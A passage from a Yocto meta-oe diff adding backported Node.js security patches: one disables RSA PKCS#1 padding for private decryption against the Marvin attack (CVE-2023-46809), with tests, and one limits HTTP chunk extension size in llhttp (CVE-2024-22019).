"range.bnf" + ], + "tap": { +- "check-coverage": true, ++ "timeout": 30, + "coverage-map": "map.js" + }, + "engines": { +-- +2.40.0 diff --git a/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2023-46809.patch b/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2023-46809.patch new file mode 100644 index 0000000000..991d39fcf9 --- /dev/null +++ b/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2023-46809.patch @@ -0,0 +1,625 @@ +From d3d357ab096884f10f5d2f164149727eea875635 Mon Sep 17 00:00:00 2001 +From: Michael Dawson <midawson@redhat.com> +Date: Thu, 4 Jan 2024 21:32:51 +0000 +Subject: [PATCH] crypto: disable PKCS#1 padding for privateDecrypt + +Refs: https://hackerone.com/bugs?subject=nodejs&report_id=2269177 + +Disable RSA_PKCS1_PADDING for crypto.privateDecrypt() in order +to protect against the Marvin attack. + +Includes a security revert flag that can be used to restore +support. + +Signed-off-by: Michael Dawson <midawson@redhat.com> +PR-URL: https://github.com/nodejs-private/node-private/pull/525 +Reviewed-By: Rafael Gonzaga <rafael.nunu@hotmail.com> +Reviewed-By: Matteo Collina <matteo.collina@gmail.com> + +CVE-ID: CVE-2023-46809 + +Upstream-Status: Backport [https://github.com/nodejs/node/commit/d3d357ab096884f1] +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + src/crypto/crypto_cipher.cc | 28 ++ + src/node_revert.h | 1 + + test/parallel/test-crypto-rsa-dsa-revert.js | 475 ++++++++++++++++++++ + test/parallel/test-crypto-rsa-dsa.js | 42 +- + 4 files changed, 533 insertions(+), 13 deletions(-) + create mode 100644 test/parallel/test-crypto-rsa-dsa-revert.js + +diff --git a/src/crypto/crypto_cipher.cc b/src/crypto/crypto_cipher.cc +index 10579ce..0311c68 100644 +--- a/src/crypto/crypto_cipher.cc ++++ b/src/crypto/crypto_cipher.cc +@@ -6,6 +6,7 @@ + #include "node_buffer.h" + #include "node_internals.h" + #include "node_process-inl.h" ++#include "node_revert.h" + #include "v8.h" + + namespace node { +@@ -1061,6 +1062,33 @@ void PublicKeyCipher::Cipher(const FunctionCallbackInfo<Value>& args) { + uint32_t padding; + if (!args[offset + 1]->Uint32Value(env->context()).To(&padding)) return; + ++ if (EVP_PKEY_cipher == EVP_PKEY_decrypt && ++ operation == PublicKeyCipher::kPrivate && padding == RSA_PKCS1_PADDING && ++ !IsReverted(SECURITY_REVERT_CVE_2023_46809)) { ++ EVPKeyCtxPointer ctx(EVP_PKEY_CTX_new(pkey.get(), nullptr)); ++ CHECK(ctx); ++ ++ if (EVP_PKEY_decrypt_init(ctx.get()) <= 0) { ++ return ThrowCryptoError(env, ERR_get_error()); ++ } ++ ++ int rsa_pkcs1_implicit_rejection = ++ EVP_PKEY_CTX_ctrl_str(ctx.get(), "rsa_pkcs1_implicit_rejection", "1"); ++ // From the doc -2 means that the option is not supported. ++ // The default for the option is enabled and if it has been ++ // specifically disabled we want to respect that so we will ++ // not throw an error if the option is supported regardless ++ // of how it is set. The call to set the value ++ // will not affect what is used since a different context is ++ // used in the call if the option is supported ++ if (rsa_pkcs1_implicit_rejection <= 0) { ++ return THROW_ERR_INVALID_ARG_VALUE( ++ env, ++ "RSA_PKCS1_PADDING is no longer supported for private decryption," ++ " this can be reverted with --security-revert=CVE-2023-46809"); ++ } ++ } ++ + const EVP_MD* digest = nullptr; + if (args[offset + 2]->IsString()) { + const Utf8Value oaep_str(env->isolate(), args[offset + 2]); +diff --git a/src/node_revert.h b/src/node_revert.h +index 83dcb62..bc2a288 100644 +--- a/src/node_revert.h ++++ b/src/node_revert.h +@@ -18,6 +18,7 @@ namespace node { + #define SECURITY_REVERSIONS(XX) \ + XX(CVE_2021_44531, "CVE-2021-44531", "Cert Verif Bypass via URI SAN") \ + XX(CVE_2021_44532, "CVE-2021-44532", "Cert Verif Bypass via Str Inject") \ ++ XX(CVE_2023_46809, "CVE-2023-46809", "Marvin attack on PKCS#1 padding") \ + // XX(CVE_2016_PEND, "CVE-2016-PEND", "Vulnerability Title") + + enum reversion { +diff --git a/test/parallel/test-crypto-rsa-dsa-revert.js b/test/parallel/test-crypto-rsa-dsa-revert.js +new file mode 100644 +index 0000000..84ec8f6 +--- /dev/null ++++ b/test/parallel/test-crypto-rsa-dsa-revert.js +@@ -0,0 +1,475 @@ ++'use strict'; ++// Flags: --security-revert=CVE-2023-46809 ++const common = require('../common'); ++if (!common.hasCrypto) ++ common.skip('missing crypto'); ++ ++const assert = require('assert'); ++const crypto = require('crypto'); ++ ++const constants = crypto.constants; ++ ++const fixtures = require('../common/fixtures'); ++ ++// Test certificates ++const certPem = fixtures.readKey('rsa_cert.crt'); ++const keyPem = fixtures.readKey('rsa_private.pem'); ++const rsaKeySize = 2048; ++const rsaPubPem = fixtures.readKey('rsa_public.pem', 'ascii'); ++const rsaKeyPem = fixtures.readKey('rsa_private.pem', 'ascii'); ++const rsaKeyPemEncrypted = fixtures.readKey('rsa_private_encrypted.pem', ++ 'ascii'); ++const dsaPubPem = fixtures.readKey('dsa_public.pem', 'ascii'); ++const dsaKeyPem = fixtures.readKey('dsa_private.pem', 'ascii'); ++const dsaKeyPemEncrypted = fixtures.readKey('dsa_private_encrypted.pem', ++ 'ascii'); ++const rsaPkcs8KeyPem = fixtures.readKey('rsa_private_pkcs8.pem'); ++const dsaPkcs8KeyPem = fixtures.readKey('dsa_private_pkcs8.pem'); ++ ++const ec = new TextEncoder(); ++ ++const openssl1DecryptError = { ++ message: 'error:06065064:digital envelope routines:EVP_DecryptFinal_ex:' + ++ 'bad decrypt', ++ code: 'ERR_OSSL_EVP_BAD_DECRYPT', ++ reason: 'bad decrypt', ++ function: 'EVP_DecryptFinal_ex', ++ library: 'digital envelope routines', ++}; ++ ++const decryptError = common.hasOpenSSL3 ? ++ { message: 'error:1C800064:Provider routines::bad decrypt' } : ++ openssl1DecryptError; ++ ++const decryptPrivateKeyError = common.hasOpenSSL3 ? { ++ message: 'error:1C800064:Provider routines::bad decrypt', ++} : openssl1DecryptError; ++ ++function getBufferCopy(buf) { ++ return buf.buffer.slice(buf.byteOffset, buf.byteOffset + buf.byteLength); ++} ++ ++// Test RSA encryption/decryption ++{ ++ const input = 'I AM THE WALRUS'; ++ const bufferToEncrypt = Buffer.from(input); ++ const bufferPassword = Buffer.from('password'); ++ ++ let encryptedBuffer = crypto.publicEncrypt(rsaPubPem, bufferToEncrypt); ++ ++ // Test other input types ++ let otherEncrypted; ++ { ++ const ab = getBufferCopy(ec.encode(rsaPubPem)); ++ const ab2enc = getBufferCopy(bufferToEncrypt); ++ ++ crypto.publicEncrypt(ab, ab2enc); ++ crypto.publicEncrypt(new Uint8Array(ab), new Uint8Array(ab2enc)); ++ crypto.publicEncrypt(new DataView(ab), new DataView(ab2enc)); ++ otherEncrypted = crypto.publicEncrypt({ ++ key: Buffer.from(ab).toString('hex'), ++ encoding: 'hex' ++ }, Buffer.from(ab2enc).toString('hex')); ++ } ++ ++ let decryptedBuffer = crypto.privateDecrypt(rsaKeyPem, encryptedBuffer); ++ const otherDecrypted = crypto.privateDecrypt(rsaKeyPem, otherEncrypted); ++ assert.strictEqual(decryptedBuffer.toString(), input); ++ assert.strictEqual(otherDecrypted.toString(), input); ++ ++ decryptedBuffer = crypto.privateDecrypt(rsaPkcs8KeyPem, encryptedBuffer); ++ assert.strictEqual(decryptedBuffer.toString(), input); ++ ++ let decryptedBufferWithPassword = crypto.privateDecrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: 'password' ++ }, encryptedBuffer); ++ ++ const otherDecryptedBufferWithPassword = crypto.privateDecrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: ec.encode('password') ++ }, encryptedBuffer); ++ ++ assert.strictEqual( ++ otherDecryptedBufferWithPassword.toString(), ++ decryptedBufferWithPassword.toString()); ++ ++ decryptedBufferWithPassword = crypto.privateDecrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: 'password' ++ }, encryptedBuffer); ++ ++ assert.strictEqual(decryptedBufferWithPassword.toString(), input); ++ ++ encryptedBuffer = crypto.publicEncrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: 'password' ++ }, bufferToEncrypt); ++ ++ decryptedBufferWithPassword = crypto.privateDecrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: 'password' ++ }, encryptedBuffer); ++ assert.strictEqual(decryptedBufferWithPassword.toString(), input); ++ ++ encryptedBuffer = crypto.privateEncrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: bufferPassword ++ }, bufferToEncrypt); ++ ++ decryptedBufferWithPassword = crypto.publicDecrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: bufferPassword ++ }, encryptedBuffer); ++ assert.strictEqual(decryptedBufferWithPassword.toString(), input); ++ ++ // Now with explicit RSA_PKCS1_PADDING. ++ encryptedBuffer = crypto.privateEncrypt({ ++ padding: crypto.constants.RSA_PKCS1_PADDING, ++ key: rsaKeyPemEncrypted, ++ passphrase: bufferPassword ++ }, bufferToEncrypt); ++ ++ decryptedBufferWithPassword = crypto.publicDecrypt({ ++ padding: crypto.constants.RSA_PKCS1_PADDING, ++ key: rsaKeyPemEncrypted, ++ passphrase: bufferPassword ++ }, encryptedBuffer); ++ assert.strictEqual(decryptedBufferWithPassword.toString(), input); ++ ++ // Omitting padding should be okay because RSA_PKCS1_PADDING is the default. ++ decryptedBufferWithPassword = crypto.publicDecrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: bufferPassword ++ }, encryptedBuffer); ++ assert.strictEqual(decryptedBufferWithPassword.toString(), input); ++ ++ // Now with RSA_NO_PADDING. Plaintext needs to match key size. ++ // OpenSSL 3.x has a rsa_check_padding that will cause an error if ++ // RSA_NO_PADDING is used. ++ if (!common.hasOpenSSL3) { ++ { ++ const plaintext = 'x'.repeat(rsaKeySize / 8); ++ encryptedBuffer = crypto.privateEncrypt({ ++ padding: crypto.constants.RSA_NO_PADDING, ++ key: rsaKeyPemEncrypted, ++ passphrase: bufferPassword ++ }, Buffer.from(plaintext)); ++ ++ decryptedBufferWithPassword = crypto.publicDecrypt({ ++ padding: crypto.constants.RSA_NO_PADDING, ++ key: rsaKeyPemEncrypted, ++ passphrase: bufferPassword ++ }, encryptedBuffer); ++ assert.strictEqual(decryptedBufferWithPassword.toString(), plaintext); ++ } ++ } ++ ++ encryptedBuffer = crypto.publicEncrypt(certPem, bufferToEncrypt); ++ ++ decryptedBuffer = crypto.privateDecrypt(keyPem, encryptedBuffer); ++ assert.strictEqual(decryptedBuffer.toString(), input); ++ ++ encryptedBuffer = crypto.publicEncrypt(keyPem, bufferToEncrypt); ++ ++ decryptedBuffer = crypto.privateDecrypt(keyPem, encryptedBuffer); ++ assert.strictEqual(decryptedBuffer.toString(), input); ++ ++ encryptedBuffer = crypto.privateEncrypt(keyPem, bufferToEncrypt); ++ ++ decryptedBuffer = crypto.publicDecrypt(keyPem, encryptedBuffer); ++ assert.strictEqual(decryptedBuffer.toString(), input); ++ ++ assert.throws(() => { ++ crypto.privateDecrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: 'wrong' ++ }, bufferToEncrypt); ++ }, decryptError); ++ ++ assert.throws(() => { ++ crypto.publicEncrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: 'wrong' ++ }, encryptedBuffer); ++ }, decryptError); ++ ++ encryptedBuffer = crypto.privateEncrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: Buffer.from('password') ++ }, bufferToEncrypt); ++ ++ assert.throws(() => { ++ crypto.publicDecrypt({ ++ key: rsaKeyPemEncrypted, ++ passphrase: Buffer.from('wrong') ++ }, encryptedBuffer); ++ }, decryptError); ++} ++ ++function test_rsa(padding, encryptOaepHash, decryptOaepHash) { ++ const size = (padding === 'RSA_NO_PADDING') ? rsaKeySize / 8 : 32; ++ const input = Buffer.allocUnsafe(size); ++ for (let i = 0; i < input.length; i++) ++ input[i] = (i * 7 + 11) & 0xff; ++ const bufferToEncrypt = Buffer.from(input); ++ ++ padding = constants[padding]; ++ ++ const encryptedBuffer = crypto.publicEncrypt({ ++ key: rsaPubPem, ++ padding: padding, ++ oaepHash: encryptOaepHash ++ }, bufferToEncrypt); ++ ++ let decryptedBuffer = crypto.privateDecrypt({ ++ key: rsaKeyPem, ++ padding: padding, ++ oaepHash: decryptOaepHash ++ }, encryptedBuffer); ++ assert.deepStrictEqual(decryptedBuffer, input); ++ ++ decryptedBuffer = crypto.privateDecrypt({ ++ key: rsaPkcs8KeyPem, ++ padding: padding, ++ oaepHash: decryptOaepHash ++ }, encryptedBuffer); ++ assert.deepStrictEqual(decryptedBuffer, input); ++} ++ ++test_rsa('RSA_NO_PADDING'); ++test_rsa('RSA_PKCS1_PADDING'); ++test_rsa('RSA_PKCS1_OAEP_PADDING'); ++ ++// Test OAEP with different hash functions. ++test_rsa('RSA_PKCS1_OAEP_PADDING', undefined, 'sha1'); ++test_rsa('RSA_PKCS1_OAEP_PADDING', 'sha1', undefined); ++test_rsa('RSA_PKCS1_OAEP_PADDING', 'sha256', 'sha256'); ++test_rsa('RSA_PKCS1_OAEP_PADDING', 'sha512', 'sha512'); ++assert.throws(() => { ++ test_rsa('RSA_PKCS1_OAEP_PADDING', 'sha256', 'sha512'); ++}, { ++ code: 'ERR_OSSL_RSA_OAEP_DECODING_ERROR' ++}); ++ ++// The following RSA-OAEP test cases were created using the WebCrypto API to ++// ensure compatibility when using non-SHA1 hash functions. ++{ ++ const { decryptionTests } = ++ JSON.parse(fixtures.readSync('rsa-oaep-test-vectors.js', 'utf8')); ++ ++ for (const { ct, oaepHash, oaepLabel } of decryptionTests) { ++ const label = oaepLabel ? Buffer.from(oaepLabel, 'hex') : undefined; ++ const copiedLabel = oaepLabel ? getBufferCopy(label) : undefined; ++ ++ const decrypted = crypto.privateDecrypt({ ++ key: rsaPkcs8KeyPem, ++ oaepHash, ++ oaepLabel: oaepLabel ? label : undefined ++ }, Buffer.from(ct, 'hex')); ++ ++ assert.strictEqual(decrypted.toString('utf8'), 'Hello Node.js'); ++ ++ const otherDecrypted = crypto.privateDecrypt({ ++ key: rsaPkcs8KeyPem, ++ oaepHash, ++ oaepLabel: copiedLabel ++ }, Buffer.from(ct, 'hex')); ++ ++ assert.strictEqual(otherDecrypted.toString('utf8'), 'Hello Node.js'); ++ } ++} ++ ++// Test invalid oaepHash and oaepLabel options. ++for (const fn of [crypto.publicEncrypt, crypto.privateDecrypt]) { ++ assert.throws(() => { ++ fn({ ++ key: rsaPubPem, ++ oaepHash: 'Hello world' ++ }, Buffer.alloc(10)); ++ }, { ++ code: 'ERR_OSSL_EVP_INVALID_DIGEST' ++ }); ++ ++ for (const oaepHash of [0, false, null, Symbol(), () => {}]) { ++ assert.throws(() => { ++ fn({ ++ key: rsaPubPem, ++ oaepHash ++ }, Buffer.alloc(10)); ++ }, { ++ code: 'ERR_INVALID_ARG_TYPE' ++ }); ++ } ++ ++ for (const oaepLabel of [0, false, null, Symbol(), () => {}, {}]) { ++ assert.throws(() => { ++ fn({ ++ key: rsaPubPem, ++ oaepLabel ++ }, Buffer.alloc(10)); ++ }, { ++ code: 'ERR_INVALID_ARG_TYPE' ++ }); ++ } ++} ++ ++// Test RSA key signing/verification ++let rsaSign = crypto.createSign('SHA1'); ++let rsaVerify = crypto.createVerify('SHA1'); ++assert.ok(rsaSign); ++assert.ok(rsaVerify); ++ ++const expectedSignature = fixtures.readKey( ++ 'rsa_public_sha1_signature_signedby_rsa_private_pkcs8.sha1', ++ 'hex' ++); ++ ++rsaSign.update(rsaPubPem); ++let rsaSignature = rsaSign.sign(rsaKeyPem, 'hex'); ++assert.strictEqual(rsaSignature, expectedSignature); ++ ++rsaVerify.update(rsaPubPem); ++assert.strictEqual(rsaVerify.verify(rsaPubPem, rsaSignature, 'hex'), true); ++ ++// Test RSA PKCS#8 key signing/verification ++rsaSign = crypto.createSign('SHA1'); ++rsaSign.update(rsaPubPem); ++rsaSignature = rsaSign.sign(rsaPkcs8KeyPem, 'hex'); ++assert.strictEqual(rsaSignature, expectedSignature); ++ ++rsaVerify = crypto.createVerify('SHA1'); ++rsaVerify.update(rsaPubPem); ++assert.strictEqual(rsaVerify.verify(rsaPubPem, rsaSignature, 'hex'), true); ++ ++// Test RSA key signing/verification with encrypted key ++rsaSign = crypto.createSign('SHA1'); ++rsaSign.update(rsaPubPem); ++const signOptions = { key: rsaKeyPemEncrypted, passphrase: 'password' }; ++rsaSignature = rsaSign.sign(signOptions, 'hex'); ++assert.strictEqual(rsaSignature, expectedSignature); ++ ++rsaVerify = crypto.createVerify('SHA1'); ++rsaVerify.update(rsaPubPem); ++assert.strictEqual(rsaVerify.verify(rsaPubPem, rsaSignature, 'hex'), true); ++ ++rsaSign = crypto.createSign('SHA1'); ++rsaSign.update(rsaPubPem); ++assert.throws(() => { ++ const signOptions = { key: rsaKeyPemEncrypted, passphrase: 'wrong' }; ++ rsaSign.sign(signOptions, 'hex'); ++}, decryptPrivateKeyError); ++ ++// ++// Test RSA signing and verification ++// ++{ ++ const privateKey = fixtures.readKey('rsa_private_b.pem'); ++ const publicKey = fixtures.readKey('rsa_public_b.pem'); ++ ++ const input = 'I AM THE WALRUS'; ++ ++ const signature = fixtures.readKey( ++ 'I_AM_THE_WALRUS_sha256_signature_signedby_rsa_private_b.sha256', ++ 'hex' ++ ); ++ ++ const sign = crypto.createSign('SHA256'); ++ sign.update(input); ++ ++ const output = sign.sign(privateKey, 'hex'); ++ assert.strictEqual(output, signature); ++ ++ const verify = crypto.createVerify('SHA256'); ++ verify.update(input); ++ ++ assert.strictEqual(verify.verify(publicKey, signature, 'hex'), true); ++ ++ // Test the legacy signature algorithm name. ++ const sign2 = crypto.createSign('RSA-SHA256'); ++ sign2.update(input); ++ ++ const output2 = sign2.sign(privateKey, 'hex'); ++ assert.strictEqual(output2, signature); ++ ++ const verify2 = crypto.createVerify('SHA256'); ++ verify2.update(input); ++ ++ assert.strictEqual(verify2.verify(publicKey, signature, 'hex'), true); ++} ++ ++ ++// ++// Test DSA signing and verification ++// ++{ ++ const input = 'I AM THE WALRUS'; ++ ++ // DSA signatures vary across runs so there is no static string to verify ++ // against. ++ const sign = crypto.createSign('SHA1'); ++ sign.update(input); ++ const signature = sign.sign(dsaKeyPem, 'hex'); ++ ++ const verify = crypto.createVerify('SHA1'); ++ verify.update(input); ++ ++ assert.strictEqual(verify.verify(dsaPubPem, signature, 'hex'), true); ++ ++ // Test the legacy 'DSS1' name. ++ const sign2 = crypto.createSign('DSS1'); ++ sign2.update(input); ++ const signature2 = sign2.sign(dsaKeyPem, 'hex'); ++ ++ const verify2 = crypto.createVerify('DSS1'); ++ verify2.update(input); ++ ++ assert.strictEqual(verify2.verify(dsaPubPem, signature2, 'hex'), true); ++} ++ ++ ++// ++// Test DSA signing and verification with PKCS#8 private key ++// ++{ ++ const input = 'I AM THE WALRUS'; ++ ++ // DSA signatures vary across runs so there is no static string to verify ++ // against. ++ const sign = crypto.createSign('SHA1'); ++ sign.update(input); ++ const signature = sign.sign(dsaPkcs8KeyPem, 'hex'); ++ ++ const verify = crypto.createVerify('SHA1'); ++ verify.update(input); ++ ++ assert.strictEqual(verify.verify(dsaPubPem, signature, 'hex'), true); ++} ++ ++ ++// ++// Test DSA signing and verification with encrypted key ++// ++const input = 'I AM THE WALRUS'; ++ ++{ ++ const sign = crypto.createSign('SHA1'); ++ sign.update(input); ++ assert.throws(() => { ++ sign.sign({ key: dsaKeyPemEncrypted, passphrase: 'wrong' }, 'hex'); ++ }, decryptPrivateKeyError); ++} ++ ++{ ++ // DSA signatures vary across runs so there is no static string to verify ++ // against. ++ const sign = crypto.createSign('SHA1'); ++ sign.update(input); ++ const signOptions = { key: dsaKeyPemEncrypted, passphrase: 'password' }; ++ const signature = sign.sign(signOptions, 'hex'); ++ ++ const verify = crypto.createVerify('SHA1'); ++ verify.update(input); ++ ++ assert.strictEqual(verify.verify(dsaPubPem, signature, 'hex'), true); ++} +diff --git a/test/parallel/test-crypto-rsa-dsa.js b/test/parallel/test-crypto-rsa-dsa.js +index 9afcb38..fd27827 100644 +--- a/test/parallel/test-crypto-rsa-dsa.js ++++ b/test/parallel/test-crypto-rsa-dsa.js +@@ -220,20 +220,36 @@ function test_rsa(padding, encryptOaepHash, decryptOaepHash) { + padding: padding, + oaepHash: encryptOaepHash + }, bufferToEncrypt); ++ if (padding === constants.RSA_PKCS1_PADDING) { ++ assert.throws(() => { ++ crypto.privateDecrypt({ ++ key: rsaKeyPem, ++ padding: padding, ++ oaepHash: decryptOaepHash ++ }, encryptedBuffer); ++ }, { code: 'ERR_INVALID_ARG_VALUE' }); ++ assert.throws(() => { ++ crypto.privateDecrypt({ ++ key: rsaPkcs8KeyPem, ++ padding: padding, ++ oaepHash: decryptOaepHash ++ }, encryptedBuffer); ++ }, { code: 'ERR_INVALID_ARG_VALUE' }); ++ } else { ++ let decryptedBuffer = crypto.privateDecrypt({ ++ key: rsaKeyPem, ++ padding: padding, ++ oaepHash: decryptOaepHash ++ }, encryptedBuffer); ++ assert.deepStrictEqual(decryptedBuffer, input); + +- let decryptedBuffer = crypto.privateDecrypt({ +- key: rsaKeyPem, +- padding: padding, +- oaepHash: decryptOaepHash +- }, encryptedBuffer); +- assert.deepStrictEqual(decryptedBuffer, input); +- +- decryptedBuffer = crypto.privateDecrypt({ +- key: rsaPkcs8KeyPem, +- padding: padding, +- oaepHash: decryptOaepHash +- }, encryptedBuffer); +- assert.deepStrictEqual(decryptedBuffer, input); ++ decryptedBuffer = crypto.privateDecrypt({ ++ key: rsaPkcs8KeyPem, ++ padding: padding, ++ oaepHash: decryptOaepHash ++ }, encryptedBuffer); ++ assert.deepStrictEqual(decryptedBuffer, input); ++ } + } + + test_rsa('RSA_NO_PADDING'); +-- +2.40.0 diff --git a/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2024-22019.patch b/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2024-22019.patch new file mode 100644 index 0000000000..ca1c7981cc --- /dev/null +++ b/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2024-22019.patch @@ -0,0 +1,556 @@ +From 911cb33cdadab57a75f97186290ea8f3903a6171 Mon Sep 17 00:00:00 2001 +From: Paolo Insogna <paolo@cowtech.it> +Date: Tue, 9 Jan 2024 18:10:04 +0100 +Subject: [PATCH] http: add maximum chunk extension size + +PR-URL: https://github.com/nodejs-private/node-private/pull/520 +Refs: https://github.com/nodejs-private/node-private/pull/518 + +CVE-ID: CVE-2024-22019 + +Upstream-Status: Backport [https://github.com/nodejs/node/commit/911cb33cdadab57a] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + deps/llhttp/CMakeLists.txt | 2 +- + deps/llhttp/include/llhttp.h | 7 +- + deps/llhttp/src/api.c | 7 + + deps/llhttp/src/llhttp.c | 122 ++++++++++++++-- + doc/api/errors.md | 12 ++ + lib/_http_server.js | 8 ++ + src/node_http_parser.cc | 20 ++- + .../test-http-chunk-extensions-limit.js | 131 ++++++++++++++++++ + tools/update-llhttp.sh | 2 +- + 9 files changed, 292 insertions(+), 19 deletions(-) + create mode 100644 test/parallel/test-http-chunk-extensions-limit.js + +diff --git a/deps/llhttp/CMakeLists.txt b/deps/llhttp/CMakeLists.txt +index d038203..747564a 100644 +--- a/deps/llhttp/CMakeLists.txt ++++ b/deps/llhttp/CMakeLists.txt +@@ -1,7 +1,7 @@ + cmake_minimum_required(VERSION 3.5.1) + cmake_policy(SET CMP0069 NEW) + +-project(llhttp VERSION 6.0.11) ++project(llhttp VERSION 6.1.0) + include(GNUInstallDirs) + + set(CMAKE_C_STANDARD 99) +diff --git a/deps/llhttp/include/llhttp.h b/deps/llhttp/include/llhttp.h +index 2da66f1..78f27ab 100644 +--- a/deps/llhttp/include/llhttp.h ++++ b/deps/llhttp/include/llhttp.h +@@ -2,8 +2,8 @@ + #define INCLUDE_LLHTTP_H_ + + #define LLHTTP_VERSION_MAJOR 6 +-#define LLHTTP_VERSION_MINOR 0 +-#define LLHTTP_VERSION_PATCH 11 ++#define LLHTTP_VERSION_MINOR 1 ++#define LLHTTP_VERSION_PATCH 0 + + #ifndef LLHTTP_STRICT_MODE + # define LLHTTP_STRICT_MODE 0 +@@ -348,6 +348,9 @@ struct llhttp_settings_s { + */ + llhttp_cb on_headers_complete; + ++ /* Possible return values 0, -1, HPE_USER */ ++ llhttp_data_cb on_chunk_parameters; ++ + /* Possible return values 0, -1, HPE_USER */ + llhttp_data_cb on_body; + +diff --git a/deps/llhttp/src/api.c b/deps/llhttp/src/api.c +index c4ce197..d3065b3 100644 +--- a/deps/llhttp/src/api.c ++++ b/deps/llhttp/src/api.c +@@ -355,6 +355,13 @@ int llhttp__on_chunk_header(llhttp_t* s, const char* p, const char* endp) { + } + + ++int llhttp__on_chunk_parameters(llhttp_t* s, const char* p, const char* endp) { ++ int err; ++ SPAN_CALLBACK_MAYBE(s, on_chunk_parameters, p, endp - p); ++ return err; ++} ++ ++ + int llhttp__on_chunk_complete(llhttp_t* s, const char* p, const char* endp) { + int err; + CALLBACK_MAYBE(s, on_chunk_complete); +diff --git a/deps/llhttp/src/llhttp.c b/deps/llhttp/src/llhttp.c +index 5e7c5d1..5eb19f6 100644 +--- a/deps/llhttp/src/llhttp.c ++++ b/deps/llhttp/src/llhttp.c +@@ -340,6 +340,8 @@ enum llparse_state_e { + s_n_llhttp__internal__n_invoke_is_equal_content_length, + s_n_llhttp__internal__n_chunk_size_almost_done, + s_n_llhttp__internal__n_chunk_parameters, ++ s_n_llhttp__internal__n_span_start_llhttp__on_chunk_parameters, ++ s_n_llhttp__internal__n_chunk_parameters_ows, + s_n_llhttp__internal__n_chunk_size_otherwise, + s_n_llhttp__internal__n_chunk_size, + s_n_llhttp__internal__n_chunk_size_digit, +@@ -539,6 +541,10 @@ int llhttp__on_body( + llhttp__internal_t* s, const unsigned char* p, + const unsigned char* endp); + ++int llhttp__on_chunk_parameters( ++ llhttp__internal_t* s, const unsigned char* p, ++ const unsigned char* endp); ++ + int llhttp__on_status( + llhttp__internal_t* s, const unsigned char* p, + const unsigned char* endp); +@@ -1226,8 +1232,7 @@ static llparse_state_t llhttp__internal__run( + goto s_n_llhttp__internal__n_chunk_parameters; + } + case 2: { +- p++; +- goto s_n_llhttp__internal__n_chunk_size_almost_done; ++ goto s_n_llhttp__internal__n_span_end_llhttp__on_chunk_parameters; + } + default: { + goto s_n_llhttp__internal__n_error_10; +@@ -1236,6 +1241,34 @@ static llparse_state_t llhttp__internal__run( + /* UNREACHABLE */; + abort(); + } ++ case s_n_llhttp__internal__n_span_start_llhttp__on_chunk_parameters: ++ s_n_llhttp__internal__n_span_start_llhttp__on_chunk_parameters: { ++ if (p == endp) { ++ return s_n_llhttp__internal__n_span_start_llhttp__on_chunk_parameters; ++ } ++ state->_span_pos0 = (void*) p; ++ state->_span_cb0 = llhttp__on_chunk_parameters; ++ goto s_n_llhttp__internal__n_chunk_parameters; ++ /* UNREACHABLE */; ++ abort(); ++ } ++ case s_n_llhttp__internal__n_chunk_parameters_ows: ++ s_n_llhttp__internal__n_chunk_parameters_ows: { ++ if (p == endp) { ++ return s_n_llhttp__internal__n_chunk_parameters_ows; ++ } ++ switch (*p) { ++ case ' ': { ++ p++; ++ goto s_n_llhttp__internal__n_chunk_parameters_ows; ++ } ++ default: { ++ goto s_n_llhttp__internal__n_span_start_llhttp__on_chunk_parameters; ++ } ++ } ++ /* UNREACHABLE */; ++ abort(); ++ } + case s_n_llhttp__internal__n_chunk_size_otherwise: + s_n_llhttp__internal__n_chunk_size_otherwise: { + if (p == endp) { +@@ -1246,13 +1279,9 @@ static llparse_state_t llhttp__internal__run( + p++; + goto s_n_llhttp__internal__n_chunk_size_almost_done; + } +- case ' ': { +- p++; +- goto s_n_llhttp__internal__n_chunk_parameters; +- } + case ';': { + p++; +- goto s_n_llhttp__internal__n_chunk_parameters; ++ goto s_n_llhttp__internal__n_chunk_parameters_ows; + } + default: { + goto s_n_llhttp__internal__n_error_11; +@@ -6074,6 +6103,24 @@ static llparse_state_t llhttp__internal__run( + /* UNREACHABLE */; + abort(); + } ++ s_n_llhttp__internal__n_span_end_llhttp__on_chunk_parameters: { ++ const unsigned char* start; ++ int err; ++ ++ start = state->_span_pos0; ++ state->_span_pos0 = NULL; ++ err = llhttp__on_chunk_parameters(state, start, p); ++ if (err != 0) { ++ state->error = err; ++ state->error_pos = (const char*) (p + 1); ++ state->_current = (void*) (intptr_t) s_n_llhttp__internal__n_chunk_size_almost_done; ++ return s_error; ++ } ++ p++; ++ goto s_n_llhttp__internal__n_chunk_size_almost_done; ++ /* UNREACHABLE */; ++ abort(); ++ } + s_n_llhttp__internal__n_error_10: { + state->error = 0x2; + state->reason = "Invalid character in chunk parameters"; +@@ -8441,6 +8488,8 @@ enum llparse_state_e { + s_n_llhttp__internal__n_invoke_is_equal_content_length, + s_n_llhttp__internal__n_chunk_size_almost_done, + s_n_llhttp__internal__n_chunk_parameters, ++ s_n_llhttp__internal__n_span_start_llhttp__on_chunk_parameters, ++ s_n_llhttp__internal__n_chunk_parameters_ows, + s_n_llhttp__internal__n_chunk_size_otherwise, + s_n_llhttp__internal__n_chunk_size, + s_n_llhttp__internal__n_chunk_size_digit, +@@ -8635,6 +8684,10 @@ int llhttp__on_body( + llhttp__internal_t* s, const unsigned char* p, + const unsigned char* endp); + ++int llhttp__on_chunk_parameters( ++ llhttp__internal_t* s, const unsigned char* p, ++ const unsigned char* endp); ++ + int llhttp__on_status( + llhttp__internal_t* s, const unsigned char* p, + const unsigned char* endp); +@@ -9299,8 +9352,7 @@ static llparse_state_t llhttp__internal__run( + goto 